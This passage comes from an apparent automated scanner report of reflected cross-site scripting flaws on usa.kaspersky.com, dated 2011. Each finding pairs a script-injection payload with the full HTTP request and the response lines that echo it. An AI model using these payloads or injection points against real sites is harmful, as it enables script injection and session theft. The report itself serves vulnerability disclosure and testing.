Last-Modified: Sun, 04 Sep 2011 13:00:12 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315141212"
Content-Type: text/html; charset=utf-8
Content-Length: 109114
Date: Sun, 04 Sep 2011 13:01:12 GMT
X-Varnish: 1163111776
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/products-services/home-computer-security/internet-security?6d3d5"><script>alert(1)</script>0c315f9bb81=1" />
...[SNIP]...

1.116. http://usa.kaspersky.com/products-services/home-computer-security/mobile-security [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/products-services/home-computer-security/mobile-security

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ee59a"-alert(1)-"e444da54003 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /products-servicesee59a"-alert(1)-"e444da54003/home-computer-security/mobile-security HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/search/apachesolr_search/xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; slider_session=yes; ev5=xss; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5; NO_CACHE=Y; s_cc=true; gpv_pageName=Store%20%7C%20Home%20Users%20%7C%20Kaspersky%20Store; s_nr=1315139071025-New; s_sq=%5B%5BB%5D%5D; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.4.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 13:06:49 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315141609"
Content-Type: text/html; charset=utf-8
Content-Length: 39738
Date: Sun, 04 Sep 2011 13:06:56 GMT
X-Varnish: 1163123095
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
rop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/products-servicesee59a"-alert(1)-"e444da54003/home-computer-security/mobile-security";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.117. http://usa.kaspersky.com/products-services/home-computer-security/mobile-security [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/products-services/home-computer-security/mobile-security

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7232c"><script>alert(1)</script>8b2c2136941 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products-services7232c"><script>alert(1)</script>8b2c2136941/home-computer-security/mobile-security HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/search/apachesolr_search/xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; slider_session=yes; ev5=xss; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5; NO_CACHE=Y; s_cc=true; gpv_pageName=Store%20%7C%20Home%20Users%20%7C%20Kaspersky%20Store; s_nr=1315139071025-New; s_sq=%5B%5BB%5D%5D; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.4.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 13:05:53 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315141553"
Content-Type: text/html; charset=utf-8
Content-Length: 38683
Date: Sun, 04 Sep 2011 13:06:03 GMT
X-Varnish: 1163121250
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/products-services7232c"><script>alert(1)</script>8b2c2136941/home-computer-security/mobile-security" />
...[SNIP]...

1.118. http://usa.kaspersky.com/products-services/home-computer-security/mobile-security [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/products-services/home-computer-security/mobile-security

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1cd88"-alert(1)-"318679f3559 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /products-services/home-computer-security1cd88"-alert(1)-"318679f3559/mobile-security HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/search/apachesolr_search/xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; slider_session=yes; ev5=xss; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5; NO_CACHE=Y; s_cc=true; gpv_pageName=Store%20%7C%20Home%20Users%20%7C%20Kaspersky%20Store; s_nr=1315139071025-New; s_sq=%5B%5BB%5D%5D; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.4.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 13:09:14 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315141754"
Content-Type: text/html; charset=utf-8
Content-Length: 39610
Date: Sun, 04 Sep 2011 13:09:30 GMT
X-Varnish: 1163127529
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/products-services/home-computer-security1cd88"-alert(1)-"318679f3559/mobile-security";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.119. http://usa.kaspersky.com/products-services/home-computer-security/mobile-security [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/products-services/home-computer-security/mobile-security

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6afa"><script>alert(1)</script>dc1a0daf0d4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products-services/home-computer-securityd6afa"><script>alert(1)</script>dc1a0daf0d4/mobile-security HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/search/apachesolr_search/xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; slider_session=yes; ev5=xss; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5; NO_CACHE=Y; s_cc=true; gpv_pageName=Store%20%7C%20Home%20Users%20%7C%20Kaspersky%20Store; s_nr=1315139071025-New; s_sq=%5B%5BB%5D%5D; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.4.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 13:08:33 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315141713"
Content-Type: text/html; charset=utf-8
Content-Length: 38734
Date: Sun, 04 Sep 2011 13:08:43 GMT
X-Varnish: 1163126100
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/products-services/home-computer-securityd6afa"><script>alert(1)</script>dc1a0daf0d4/mobile-security" />
...[SNIP]...

1.120. http://usa.kaspersky.com/products-services/home-computer-security/mobile-security [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/products-services/home-computer-security/mobile-security

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5c305"-alert(1)-"ab57f4ebc3c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /products-services/home-computer-security/mobile-security5c305"-alert(1)-"ab57f4ebc3c HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/search/apachesolr_search/xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; slider_session=yes; ev5=xss; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5; NO_CACHE=Y; s_cc=true; gpv_pageName=Store%20%7C%20Home%20Users%20%7C%20Kaspersky%20Store; s_nr=1315139071025-New; s_sq=%5B%5BB%5D%5D; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.4.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 13:11:23 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315141883"
Content-Type: text/html; charset=utf-8
Content-Length: 39674
Date: Sun, 04 Sep 2011 13:11:29 GMT
X-Varnish: 1163130713
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
rop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/products-services/home-computer-security/mobile-security5c305"-alert(1)-"ab57f4ebc3c";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.121. http://usa.kaspersky.com/products-services/home-computer-security/mobile-security [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/products-services/home-computer-security/mobile-security

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48453"><script>alert(1)</script>f916dd51d3f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products-services/home-computer-security/mobile-security48453"><script>alert(1)</script>f916dd51d3f HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/search/apachesolr_search/xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; slider_session=yes; ev5=xss; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5; NO_CACHE=Y; s_cc=true; gpv_pageName=Store%20%7C%20Home%20Users%20%7C%20Kaspersky%20Store; s_nr=1315139071025-New; s_sq=%5B%5BB%5D%5D; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.4.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 13:11:02 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315141862"
Content-Type: text/html; charset=utf-8
Content-Length: 38798
Date: Sun, 04 Sep 2011 13:11:12 GMT
X-Varnish: 1163130234
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/products-services/home-computer-security/mobile-security48453"><script>alert(1)</script>f916dd51d3f" />
...[SNIP]...

1.122. http://usa.kaspersky.com/products-services/home-computer-security/mobile-security [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/products-services/home-computer-security/mobile-security

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c748"><script>alert(1)</script>97e9ae62b7c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products-services/home-computer-security/mobile-security?8c748"><script>alert(1)</script>97e9ae62b7c=1 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/search/apachesolr_search/xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; slider_session=yes; ev5=xss; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5; NO_CACHE=Y; s_cc=true; gpv_pageName=Store%20%7C%20Home%20Users%20%7C%20Kaspersky%20Store; s_nr=1315139071025-New; s_sq=%5B%5BB%5D%5D; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.4.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Sun, 04 Sep 2011 13:01:58 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315141318"
Content-Type: text/html; charset=utf-8
Content-Length: 77948
Date: Sun, 04 Sep 2011 13:02:13 GMT
X-Varnish: 1163114601
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/products-services/home-computer-security/mobile-security?8c748"><script>alert(1)</script>97e9ae62b7c=1" />
...[SNIP]...

1.123. http://usa.kaspersky.com/products-services/home-computer-security/pure [ICID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/products-services/home-computer-security/pure

Issue detail

The value of the ICID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45594"><script>alert(1)</script>43356559f66 was submitted in the ICID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products-services/home-computer-security/pure?ICID=INT167388645594"><script>alert(1)</script>43356559f66 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.1.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; slider_session=yes; gpv_pageName=Homepage; s_nr=1315139037033-New; s_sq=kaspersky-usa%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fsites%25252Fusa.kaspersky.com%25252Ffiles%25252Fcustom_search%25252Fsearch-grey.gif%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Sun, 04 Sep 2011 12:34:45 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315139685"
Content-Type: text/html; charset=utf-8
Content-Length: 107152
Date: Sun, 04 Sep 2011 12:35:00 GMT
X-Varnish: 1163070127
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/products-services/home-computer-security/pure?ICID=INT167388645594"><script>alert(1)</script>43356559f66" />
...[SNIP]...

1.124. http://usa.kaspersky.com/products-services/home-computer-security/pure [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/products-services/home-computer-security/pure

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fb7f5"-alert(1)-"314b0280887 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /products-servicesfb7f5"-alert(1)-"314b0280887/home-computer-security/pure?ICID=INT1673886 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.1.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; slider_session=yes; gpv_pageName=Homepage; s_nr=1315139037033-New; s_sq=kaspersky-usa%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fsites%25252Fusa.kaspersky.com%25252Ffiles%25252Fcustom_search%25252Fsearch-grey.gif%2526ot%253DIMAGE

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 12:57:11 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315141031"
Content-Type: text/html; charset=utf-8
Content-Length: 40441
Date: Sun, 04 Sep 2011 12:57:54 GMT
X-Varnish: 1163106133
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
rop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/products-servicesfb7f5"-alert(1)-"314b0280887/home-computer-security/pure?ICID=INT1673886";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.125. http://usa.kaspersky.com/products-services/home-computer-security/pure [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/products-services/home-computer-security/pure

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a252"><script>alert(1)</script>7809b8460a4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products-services3a252"><script>alert(1)</script>7809b8460a4/home-computer-security/pure?ICID=INT1673886 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.1.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; slider_session=yes; gpv_pageName=Homepage; s_nr=1315139037033-New; s_sq=kaspersky-usa%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fsites%25252Fusa.kaspersky.com%25252Ffiles%25252Fcustom_search%25252Fsearch-grey.gif%2526ot%253DIMAGE

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 12:55:48 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315140948"
Content-Type: text/html; charset=utf-8
Content-Length: 39320
Date: Sun, 04 Sep 2011 12:56:08 GMT
X-Varnish: 1163103380
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/products-services3a252"><script>alert(1)</script>7809b8460a4/home-computer-security/pure?ICID=INT1673886" />
...[SNIP]...

1.126. http://usa.kaspersky.com/products-services/home-computer-security/pure [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/products-services/home-computer-security/pure

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a91a9"-alert(1)-"929e765b02d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /products-services/home-computer-securitya91a9"-alert(1)-"929e765b02d/pure?ICID=INT1673886 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.1.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; slider_session=yes; gpv_pageName=Homepage; s_nr=1315139037033-New; s_sq=kaspersky-usa%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fsites%25252Fusa.kaspersky.com%25252Ffiles%25252Fcustom_search%25252Fsearch-grey.gif%2526ot%253DIMAGE

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 13:02:39 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315141359"
Content-Type: text/html; charset=utf-8
Content-Length: 40677
Date: Sun, 04 Sep 2011 13:02:49 GMT
X-Varnish: 1163115535
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

